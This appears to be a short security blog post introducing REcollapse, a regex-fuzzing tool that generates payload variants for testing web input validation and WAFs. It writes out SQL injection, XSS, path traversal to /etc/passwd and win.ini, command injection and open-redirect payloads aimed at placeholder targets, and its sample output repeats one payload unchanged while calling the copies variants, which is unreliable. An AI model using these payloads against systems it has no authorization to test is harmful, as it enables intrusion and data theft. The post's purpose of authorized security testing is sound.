Listen to this Post
REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications. It can also be helpful to bypass WAFs and weak vulnerability mitigations. The goal of this tool is to generate payloads for testing, while actual fuzzing should be done with other tools like Burp (intruder), ffuf, or similar.
GitHub URL: https://github.com/0xacb/recollapse
You Should Know:
Installation:
git clone https://github.com/0xacb/recollapse.git cd recollapse pip3 install -r requirements.txt
Basic Usage:
python3 recollapse.py --help python3 recollapse.py -e 'input_string'
Advanced Payload Generation:
Generate payloads for SQL injection testing python3 recollapse.py -e "admin' OR 1=1--" Generate payloads for XSS testing python3 recollapse.py -e "<script>alert(1)</script>"
Combining with FFUF:
Generate payloads and pipe to ffuf python3 recollapse.py -e "payload" | ffuf -u "http://target.com/FUZZ" -w -
WAF Bypass Techniques:
Generate various encoding alternatives python3 recollapse.py -e "../../etc/passwd" --levels 3
Common Regex Bypass Patterns:
Test for command injection bypasses python3 recollapse.py -e ";id" python3 recollapse.py -e "|id" python3 recollapse.py -e "<code>id</code>"
Useful Linux Commands for Security Testing:
Monitor web server logs while testing tail -f /var/log/apache2/access.log Check for WAF responses curl -v -H "X-Forwarded-For: 127.0.0.1" http://target.com Test for open redirects curl -I "http://target.com/redirect.php?url=http://evil.com"
Windows Equivalent Commands:
:: Check network connections during testing netstat -ano :: Test for file inclusion vulnerabilities curl http://target.com/index.php?page=..\..\..\windows\win.ini
What Undercode Say:
REcollapse is a powerful addition to any security researcher’s toolkit, particularly when dealing with web applications that implement input validation through regular expressions. The tool’s ability to generate numerous variations of a single payload makes it invaluable for discovering edge cases in validation routines. When combined with traditional fuzzing tools like Burp Suite or FFUF, it can significantly increase the chances of finding vulnerabilities that might otherwise be missed.
For comprehensive testing, consider integrating REcollapse into your automated security testing pipelines. The generated payloads can be particularly effective against applications that implement custom security controls rather than well-established frameworks. Remember that responsible disclosure is crucial when findings vulnerabilities – always obtain proper authorization before testing systems you don’t own.
Expected Output:
[+] Generated 24 payloads for: admin' OR 1=1-- admin' OR 1=1-- admin' OR 1=1-- admin' OR 1=1-- admin' OR 1=1-- admin' OR 1=1-- ...
References:
Reported By: Abhirup Konwar – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
